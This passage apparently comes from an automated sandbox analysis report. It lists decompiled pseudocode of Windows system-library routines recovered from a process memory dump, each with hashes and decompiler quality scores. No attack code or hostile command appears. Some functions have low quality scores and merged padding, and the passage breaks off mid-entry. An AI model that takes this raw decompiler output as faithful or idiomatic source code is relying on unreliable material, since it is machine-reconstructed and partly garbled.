                                                                                                                                  E010B9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) { 				intOrPtr _t33; 				intOrPtr _t37; 				intOrPtr _t41; 				intOrPtr* _t46; 				void* _t48; 				intOrPtr _t50; 				intOrPtr* _t60; 				void* _t61; 				intOrPtr _t62; 				intOrPtr _t65; 				void* _t66; 				void* _t68;  				_push(0xc); 				_push(0x118f708); 				E0110D08C(__ebx, __edi, __esi); 				_t65 = __ecx; 				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx; 				if( *(__ecx + 0x24) != 0) { 					_push( *(__ecx + 0x24)); 					E010F95D0(); 					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000; 				} 				L6(); 				L6(); 				_push( *((intOrPtr*)(_t65 + 0x28))); 				E010F95D0(); 				_t33 =  *0x11a84c4; // 0x0 				L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10))); 				_t37 =  *0x11a84c4; // 0x0 				L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c))); 				_t41 =  *0x11a84c4; // 0x0 				E010D2280(L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x11a86b4); 				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000; 				_t46 = _t65 + 0xe8; 				_t62 =  *_t46; 				_t60 =  *((intOrPtr*)(_t46 + 4)); 				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) { 					_t61 = 3; 					asm("int 0x29"); 					_push(_t65); 					_t66 = _t61; 					_t23 = _t66 + 0x14; // 0x8df8084c 					_push( *_t23); 					E010F95D0(); 					_t24 = _t66 + 0x10; // 0x89e04d8b 					_push( *_t24); 					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000; 					_t48 = E010F95D0(); 					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000; 					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000; 					return _t48; 				} else { 					 *_t60 = _t62; 					 *((intOrPtr*)(_t62 + 4)) = _t60; 					 *(_t68 - 4) = 0xfffffffe; 					E010B9325(); 					_t50 =  *0x11a84c4; // 0x0 					return E0110D0D1(L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65)); 				} 			}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 83af6a107485b827e432b1dbc0e2768c7fb9da7c249482c0370a4164b299fef6
                                                                            • Instruction ID: 4407718a1b125924df67cc56bc518fc4e15b62a1f25dde0a1275d8d96a4628bf
                                                                            • Opcode Fuzzy Hash: 83af6a107485b827e432b1dbc0e2768c7fb9da7c249482c0370a4164b299fef6
                                                                            • Instruction Fuzzy Hash: 9B214CB1041601DFC726EF68CA40F99BBF9FF18708F55456CE189876A2CB34E941CB44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
E01144257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
    intOrPtr* _t18;
    intOrPtr _t24;
    intOrPtr* _t27;
    intOrPtr* _t30;
    intOrPtr* _t31;
    intOrPtr _t33;
    intOrPtr* _t34;
    intOrPtr* _t35;
    void* _t37;
    void* _t38;
    void* _t39;
    void* _t43;

    _t39 = __eflags;
    _t35 = __edi;
    _push(8);
    _push(0x11908d0);
    E0110D08C(__ebx, __edi, __esi);
    _t37 = __ecx;
    E011441E8(__ebx, __edi, __ecx, _t39);
    E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
    *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
    _t18 = _t37 + 8;
    _t33 =  *_t18;
    _t27 =  *((intOrPtr*)(_t18 + 4));
    if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
        L8:
        _push(3);
        asm("int 0x29");
    } else {
        *_t27 = _t33;
        *((intOrPtr*)(_t33 + 4)) = _t27;
        _t35 = 0x11a87e4;
        _t18 =  *0x11a87e0; // 0x0
        while(_t18 != 0) {
            _t43 = _t18 -  *0x11a5cd0; // 0xffffffff
            if(_t43 >= 0) {
                _t31 =  *0x11a87e4; // 0x0
                _t18 =  *_t31;
                if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                    goto L8;
                } else {
                    *0x11a87e4 = _t18;
                    *((intOrPtr*)(_t18 + 4)) = _t35;
                    L010B7055(_t31 + 0xfffffff8);
                    _t24 =  *0x11a87e0; // 0x0
                    _t18 = _t24 - 1;
                    *0x11a87e0 = _t18;
                    continue;
                }
            }
            goto L9;
        }
    }
    L9:
    __eflags =  *0x11a5cd0;
    if( *0x11a5cd0 <= 0) {
        L010B7055(_t37);
    } else {
        _t30 = _t37 + 8;
        _t34 =  *0x11a87e8; // 0x0
        __eflags =  *_t34 - _t35;
        if( *_t34 != _t35) {
            goto L8;
        } else {
            *_t30 = _t35;
            *((intOrPtr*)(_t30 + 4)) = _t34;
            *_t34 = _t30;
            *0x11a87e8 = _t30;
            *0x11a87e0 = _t18 + 1;
        }
    }
    *(_t38 - 4) = 0xfffffffe;
    return E0110D0D1(L01144320());
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fb59fcc2b22fe64009e12b3ef097421a7595ce46d5c55be7c2604f5915b8e6aa
                                                                            • Instruction ID: 2fb9544409a1fd8da1317c043405e853e71156ea9c44f1ac34cbdc5ee8cac3ee
                                                                            • Opcode Fuzzy Hash: fb59fcc2b22fe64009e12b3ef097421a7595ce46d5c55be7c2604f5915b8e6aa
                                                                            • Instruction Fuzzy Hash: 4B218EB0900A01CFC72DDFA8E040B547FF1FB95B55B90826ED1698BA99D731D492CF01
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 29%
E010E2397(intOrPtr _a4) {
    void* __ebx;
    void* __ecx;
    void* __edi;
    void* __esi;
    void* __ebp;
    signed int _t11;
    void* _t19;
    void* _t25;
    void* _t26;
    intOrPtr _t27;
    void* _t28;
    void* _t29;

    _t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
    if( *0x11a848c != 0) {
        L010DFAD0(0x11a8610);
        if( *0x11a848c == 0) {
            E010DFA00(0x11a8610, _t19, _t27, 0x11a8610);
            goto L1;
        } else {
            _push(0);
            _push(_a4);
            _t26 = 4;
            _t29 = E010E2581(0x11a8610, 0x10950a0, _t26, _t27, _t28);
            E010DFA00(0x11a8610, 0x10950a0, _t27, 0x11a8610);
        }
    } else {
        L1:
        _t11 =  *0x11a8614; // 0x1
        if(_t11 == 0) {
            _t11 = E010F4886(0x1091088, 1, 0x11a8614);
        }
        _push(0);
        _push(_a4);
        _t25 = 4;
        _t29 = E010E2581(0x11a8610, (_t11 << 4) + 0x1095070, _t25, _t27, _t28);
    }
    if(_t29 != 0) {
        *((intOrPtr*)(_t29 + 0x38)) = _t27;
        *((char*)(_t29 + 0x40)) = 0;
    }
    return _t29;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0067603cd667e5500eb37df8bb9547be64126dd94006f0f5c2354e658ec04f34
                                                                            • Instruction ID: d07e567aeaf3043a68243d24ca8edadd5f12a9c196d56f4bbe51b224d06b0385
                                                                            • Opcode Fuzzy Hash: 0067603cd667e5500eb37df8bb9547be64126dd94006f0f5c2354e658ec04f34
                                                                            • Instruction Fuzzy Hash: 49116F727043115BE735963FDC44B59BACCBBA0611F48C02AF68797140CA70D841C754
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
E011346A7(signed short* __ecx, unsigned int __edx, char* _a4) {
    signed short* _v8;
    unsigned int _v12;
    intOrPtr _v16;
    signed int _t22;
    signed char _t23;
    short _t32;
    void* _t38;
    char* _t40;

    _v12 = __edx;
    _t29 = 0;
    _v8 = __ecx;
    _v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
    _t38 = L010D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
    if(_t38 != 0) {
        _t40 = _a4;
        *_t40 = 1;
        E010FF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
        _t22 = _v12 >> 1;
        _t32 = 0x2e;
        *((short*)(_t38 + _t22 * 2)) = _t32;
        *((short*)(_t38 + 2 + _t22 * 2)) = 0;
        _t23 = E010ED268(_t38, 1);
        asm("sbb al, al");
        *_t40 =  ~_t23 + 1;
        L010D77F0(_v16, 0, _t38);
    } else {
        *_a4 = 0;
        _t29 = 0xc0000017;
    }
    return _t29;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                            • Instruction ID: e3ddd3ed4638ee86ca98da96783b091ec759104c707d008c704c330de9e1e917
                                                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                            • Instruction Fuzzy Hash: 76112572504208BFC7059F5CD8808BEB7B9EF95300F10806EF984CB350DA318D55D3A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 42%
E010BC962(char __ecx) {
    signed int _v8;
    intOrPtr _v12;
    void* __ebx;
    void* __edi;
    void* __esi;
    intOrPtr _t19;
    char _t22;
    intOrPtr _t26;
    intOrPtr _t27;
    char _t32;
    char _t34;
    intOrPtr _t35;
    intOrPtr _t37;
    intOrPtr* _t38;
    signed int _t39;

    _t41 = (_t39 & 0xfffffff8) - 0xc;
    _v8 =  *0x11ad360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
    _t34 = __ecx;
    if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
        _t26 = 0;
        E010CEEF0(0x11a70a0);
        _t29 =  *((intOrPtr*)(_t34 + 0x18));
        if(E0113F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
            L9:
            E010CEB70(_t29, 0x11a70a0);
            _t19 = _t26;
            L2:
            _pop(_t35);
            _pop(_t37);
            _pop(_t27);
            return E010FB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
        }
        _t29 = _t34;
        _t26 = E0113F1FC(_t34, _t32);
        if(_t26 < 0) {
            goto L9;
        }
        _t38 =  *0x11a70c0; // 0x0
        while(_t38 != 0x11a70c0) {
            _t22 =  *((intOrPtr*)(_t38 + 0x18));
            _t38 =  *_t38;
            _v12 = _t22;
            if(_t22 != 0) {
                _t29 = _t22;
                *0x11ab1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                _v12();
            }
        }
        goto L9;
    }
    _t19 = 0;
    goto L2;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 991d3fd0edb826b6e1deb922a3e5a97f6106413dd4894c1d13a286e8497f3660
                                                                            • Instruction ID: 4f5b4d92c9d679adca624e71bd6a3a7646d5c8387986597d499d5954f0df5dfb
                                                                            • Opcode Fuzzy Hash: 991d3fd0edb826b6e1deb922a3e5a97f6106413dd4894c1d13a286e8497f3660
                                                                            • Instruction Fuzzy Hash: 951121313047139BC728AF3CDD85A6B7BE1BBA4610F40063DE98183690DB20ED60CBD2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
E010F37F5(void* __ecx, intOrPtr* __edx) {
    void* __ebx;
    void* __edi;
    signed char _t6;
    intOrPtr _t13;
    intOrPtr* _t20;
    intOrPtr* _t27;
    void* _t28;
    intOrPtr* _t29;

    _t27 = __edx;
    _t28 = __ecx;
    if(__edx == 0) {
        E010D2280(_t6, 0x11a8550);
    }
    _t29 = E010F387E(_t28);
    if(_t29 == 0) {
        L6:
        if(_t27 == 0) {
            E010CFFB0(0x11a8550, _t27, 0x11a8550);
        }
        if(_t29 == 0) {
            return 0xc0000225;
        } else {
            if(_t27 != 0) {
                goto L14;
            }
            L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
            goto L11;
        }
    } else {
        _t13 = *_t29;
        if( *((intOrPtr*)(_t13 + 4)) != _t29) {
            L13:
            _push(3);
            asm("int 0x29");
            L14:
            *_t27 = _t29;
            L11:
            return 0;
        }
        _t20 = *((intOrPtr*)(_t29 + 4));
        if( *_t20 != _t29) {
            goto L13;
        }
        *_t20 = _t13;
        *((intOrPtr*)(_t13 + 4)) = _t20;
        asm("btr eax, ecx");
        goto L6;
    }
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 75d3192747473b8225ea4e9de50f7b9a1dfc7b37c8a59a9439a4f9b0723a3271
                                                                            • Instruction ID: aa4f569f6b5defa951819d631cab026490e7f824d47312252a971d03c6c296c0
                                                                            • Opcode Fuzzy Hash: 75d3192747473b8225ea4e9de50f7b9a1dfc7b37c8a59a9439a4f9b0723a3271
                                                                            • Instruction Fuzzy Hash: CB0161B29017119BC3678A1D9941A2ABBE6FF85A70F1540ADEA858FB15D738D802C790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E010E002D() {
    void* _t11;
    char* _t14;
    signed char* _t16;
    char* _t27;
    signed char* _t29;

    _t11 = E010D7D50();
    _t27 = 0x7ffe0384;
    if(_t11 != 0) {
        _t14 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
    } else {
        _t14 = 0x7ffe0384;
    }
    _t29 = 0x7ffe0385;
    if( *_t14 != 0) {
        if(E010D7D50() == 0) {
            _t16 = 0x7ffe0385;
        } else {
            _t16 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
        }
        if(( *_t16 & 0x00000040) != 0) {
            goto L18;
        } else {
            goto L3;
        }
    } else {
        L3:
        if(E010D7D50() != 0) {
            _t27 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
        }
        if( *_t27 != 0) {
            if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                goto L5;
            }
            if(E010D7D50() != 0) {
                _t29 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
            }
            if(( *_t29 & 0x00000020) == 0) {
                goto L5;
            }
            L18:
            return 1;
        } else {
            L5:
            return 0;
        }
    }
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                            • Instruction ID: b6ed602d9ba11fb9779e907c985a9b98181c490e7140da5dac4d3f79e526d179
                                                                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                            • Instruction Fuzzy Hash: 921104323016918FE727972DD948B353BE4EF42B58F0900E0FE4497E96D369D851C260
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
E010C766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
    char _v8;
    void* _t22;
    void* _t24;
    intOrPtr _t29;
    intOrPtr* _t30;
    void* _t42;
    intOrPtr _t47;

    _push(__ecx);
    _t36 = &_v8;
    if(E010EF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
        L10:
        _t22 = 0;
    } else {
        _t24 = _v8 + __ecx;
        _t42 = _t24;
        if(_t24 < __ecx) {
            goto L10;
        } else {
            if(E010EF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                goto L10;
            } else {
                _t29 = _v8 + _t42;
                if(_t29 < _t42) {
                    goto L10;
                } else {
                    _t47 = _t29;
                    _t30 = _a16;
                    if(_t30 != 0) {
                        *_t30 = _t47;
                    }
                    if(_t47 == 0) {
                        goto L10;
                    } else {
                        _t22 = L010D4620(_t36, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                    }
                }
            }
        }
    }
    return _t22;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                            • Instruction ID: f462b68c2c6e8fb6a72290feee298ba5a7f3354229a60550f141e721da713396
                                                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                            • Instruction Fuzzy Hash: 65018832700119AFD7309F6ECC45E9F7BEDEB98B60B144568BA49CB250DA31DD018FA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 46%
E0114C450(intOrPtr* _a4) {
    signed char _t25;
    intOrPtr* _t26;
    intOrPtr* _t27;

    _t26 = _a4;
    _t25 = *(_t26 + 0x10);
    if((_t25 & 0x00000003) != 1) {
        _push(0);
        _push(0);
        _push(0);
        _push( *((intOrPtr*)(_t26 + 8)));
        _push(0);
        _push( *_t26);
        E010F9910();
        _t25 = *(_t26 + 0x10);
    }
    if((_t25 & 0x00000001) != 0) {
        _push(4);
        _t7 = _t26 + 4; // 0x4
        _t27 = _t7;
        _push(_t27);
        _push(5);
        _push(0xfffffffe);
        E010F95B0();
        if( *_t27 != 0) {
            _push( *_t27);
            E010F95D0();
        }
    }
    _t8 = _t26 + 0x14; // 0x14
    if( *((intOrPtr*)(_t26 + 8)) != _t8) {
        L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, *((intOrPtr*)(_t26 + 8)));
    }
    _push( *_t26);
    E010F95D0();
    return L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                            • Instruction ID: 3b74bcf718540b200011e3aa04b794e3e8db2472bedd1d97b65571fa3d41ed02
                                                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                            • Instruction Fuzzy Hash: 7A01D272140606BFE725AF69CD80FA2FB6DFF64B94F044529F24442960CB21ACA0CBE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 69%
E010B9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
    intOrPtr* _t51;
    intOrPtr _t59;
    signed int _t64;
    signed int _t67;
    signed int* _t71;
    signed int _t74;
    signed int _t77;
    signed int _t82;
    intOrPtr* _t84;
    void* _t85;
    intOrPtr* _t87;
    void* _t94;
    signed int _t95;
    intOrPtr* _t97;
    signed int _t99;
    signed int _t102;
    void* _t104;

    _push(__ebx);
    _push(__esi);
    _push(__edi);
    _t97 = __ecx;
    _t102 = *(__ecx + 0x14);
    if((_t102 & 0x02ffffff) == 0x2000000) {
        _t102 = _t102 | 0x000007d0;
    }
    _t48 = *[fs:0x30];
    if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
        _t102 = _t102 & 0xff000000;
    }
    _t80 = 0x11a85ec;
    E010D2280(_t48, 0x11a85ec);
    _t51 = *_t97 + 8;
    if( *_t51 != 0) {
        L6:
        return E010CFFB0(_t80, _t97, _t80);
    } else {
        *(_t97 + 0x14) = _t102;
        _t84 = *0x11a538c; // 0x776f6888
        if( *_t84 != 0x11a5388) {
            _t85 = 3;
            asm("int 0x29");
            asm("int3");
            asm("int3");
            asm("int3");
            asm("int3");
            asm("int3");
            asm("int3");
            asm("int3");
            asm("int3");
            asm("int3");
            asm("int3");
            asm("int3");
            asm("int3");
            _push(0x2c);
            _push(0x118f6e8);
            E0110D0E8(0x11a85ec, _t97, _t102);
            *((char*)(_t104 - 0x1d)) = 0;
            _t99 = *(_t104 + 8);
            __eflags = _t99;
            if(_t99 == 0) {
                L13:
                __eflags = *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                if(__eflags == 0) {
                    E011888F5(_t80, _t85, 0x11a5388, _t99, _t102, __eflags);
                }
            } else {
                __eflags = _t99 - *0x11a86c0; // 0x5e07b0
                if(__eflags == 0) {
                    goto L13;
                } else {
                    __eflags = _t99 - *0x11a86b8; // 0x0
                    if(__eflags == 0) {
                        goto L13;
                    } else {
                        _t59 = *((intOrPtr*)( *[fs:0x30] + 0xc));
                        __eflags = *((char*)(_t59 + 0x28));
                        if( *((char*)(_t59 + 0x28)) == 0) {
                            E010D2280(_t99 + 0xe0, _t99 + 0xe0);
                            *(_t104 - 4) = *(_t104 - 4) & 0x00000000;
                            __eflags = *((char*)(_t99 + 0xe5));
                            if(__eflags != 0) {
                                E011888F5(0x11a85ec, _t85, 0x11a5388, _t99, _t102, __eflags);
                            } else {
                                __eflags = *((char*)(_t99 + 0xe4));
                                if( *((char*)(_t99 + 0xe4)) == 0) {
                                    *((char*)(_t99 + 0xe4)) = 1;
                                    _push(_t99);
                                    _push( *((intOrPtr*)(_t99 + 0x24)));
                                    E010FAFD0();
                                }
                                while(1) {
                                    _t71 = _t99 + 8;
                                    *(_t104 - 0x2c) = _t71;
                                    _t80 = *_t71;
                                    _t95 = _t71[1];
                                    *(_t104 - 0x28) = _t80;
                                    *(_t104 - 0x24) = _t95;
                                    while(1) {
                                        L19:
                                        __eflags = _t95;
                                        if(_t95 == 0) {
                                            break;
                                        }
                                        _t102 = _t80;
                                        *(_t104 - 0x30) = _t95;
                                        *(_t104 - 0x24) = _t95 - 1;
                                        asm("lock cmpxchg8b [edi]");
                                        _t80 = _t102;
                                        *(_t104 - 0x28) = _t80;
                                        *(_t104 - 0x24) = _t95;
                                        __eflags = _t80 - _t102;
                                        _t99 = *(_t104 + 8);
                                        if(_t80 != _t102) {
                                            continue;
                                        } else {
                                            __eflags = _t95 - *(_t104 - 0x30);
                                            if(_t95 != *(_t104 - 0x30)) {
                                                continue;
                                            } else {
                                                __eflags = _t95;
                                                if(_t95 != 0) {
                                                    _t74 = 0;
                                                    *(_t104 - 0x34) = 0;
                                                    _t102 = 0;
                                                    __eflags = 0;
                                                    while(1) {
                                                        *(_t104 - 0x3c) = _t102;
                                                        __eflags = _t102 - 3;
                                                        if(_t102 >= 3) {
                                                            break;
                                                        }
                                                        __eflags = _t74;
                                                        if(_t74 != 0) {
                                                            L49:
                                                            _t102 = *_t74;
                                                            __eflags = _t102;
                                                            if(_t102 != 0) {
                                                                _t102 = *(_t102 + 4);
                                                                __eflags = _t102;
                                                                if(_t102 != 0) {
                                                                    *0x11ab1e0(_t74, _t99);
                                                                    *_t102();
                                                                }
                                                            }
                                                            do {
                                                                _t71 = _t99 + 8;
                                                                *(_t104 - 0x2c) = _t71;
                                                                _t80 = *_t71;
                                                                _t95 = _t71[1];
                                                                *(_t104 - 0x28) = _t80;
                                                                *(_t104 - 0x24) = _t95;
                                                                goto L19;
                                                            } while (_t74 == 0);
                                                            goto L49;
                                                        } else {
                                                            _t82 = 0;
                                                            __eflags = 0;
                                                            while(1) {
                                                                *(_t104 - 0x38) = _t82;
                                                                __eflags = _t82 - *0x11a84c0;
                                                                if(_t82 >= *0x11a84c0) {
                                                                    break;
                                                                }
                                                                __eflags = _t74;
                                                                if(_t74 == 0) {
                                                                    _t77 = E01189063(_t82 * 0xc + *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                                    __eflags = _t77;
                                                                    if(_t77 == 0) {
                                                                        _t74 = 0;
                                                                        __eflags = 0;
                                                                    } else {
                                                                        _t74 = _t77 + 0xfffffff4;
                                                                    }
                                                                    *(_t104 - 0x34) = _t74;
                                                                    _t82 = _t82 + 1;
                                                                    continue;
                                                                }
                                                                break;
                                                            }
                                                            _t102 = _t102 + 1;
                                                            continue;
                                                        }
                                                        goto L20;
                                                    }
                                                    __eflags = _t74;
                                                }
                                            }
                                        }
                                        break;
                                    }
                                    L20:
                                    *((intOrPtr*)(_t99 + 0xf4)) = *((intOrPtr*)(_t104 + 4));
                                    *((char*)(_t99 + 0xe5)) = 1;
                                    *((char*)(_t104 - 0x1d)) = 1;
                                    goto L21;
                                }
                            }
                            L21:
                            *(_t104 - 4) = 0xfffffffe;
                            E010B922A(_t99);
                            _t64 = E010D7D50();
                            __eflags = _t64;
                            if(_t64 != 0) {
                                _t67 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            } else {
                                _t67 = 0x7ffe0386;
                            }
                            __eflags = *_t67;
                            if( *_t67 != 0) {
                                _t67 = E01188B58(_t99);
                            }
                            __eflags = *((char*)(_t104 - 0x1d));
                            if( *((char*)(_t104 - 0x1d)) != 0) {
                                __eflags = _t99 - *0x11a86c0; // 0x5e07b0
                                if(__eflags != 0) {
                                    __eflags = _t99 - *0x11a86b8; // 0x0
                                    if(__eflags == 0) {
                                        _t94 = 0x11a86bc;
                                        _t87 = 0x11a86b8;
                                        goto L27;
                                    } else {
                                        __eflags = _t67 | 0xffffffff;
                                        asm("lock xadd [edi], eax");
                                        if(__eflags == 0) {
                                            E010B9240(_t80, _t99, _t99, _t102, __eflags);
                                        }
                                    }
                                } else {
                                    _t94 = 0x11a86c4;
                                    _t87 = 0x11a86c0;
                                    L27:
                                    E010E9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                }
                            }
                        } else {
                            goto L13;
                        }
                    }
                }
            }
            return E0110D130(_t80, _t99, _t102);
        } else {
            *_t51 = 0x11a5388;
            *((intOrPtr*)(_t51 + 4)) = _t84;
            *_t84 = _t51;
            *0x11a538c = _t51;
            goto L6;
        }
    }
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6859d6f4c5e9977bc92457eb3a6b6fe49771edaf929abcbd9d7c2b2435c1fcb5
                                                                            • Instruction ID: 96c5fa4e7cf7920271591471b392f11f7697a6d632161adb4e8c95a3b3e497d5
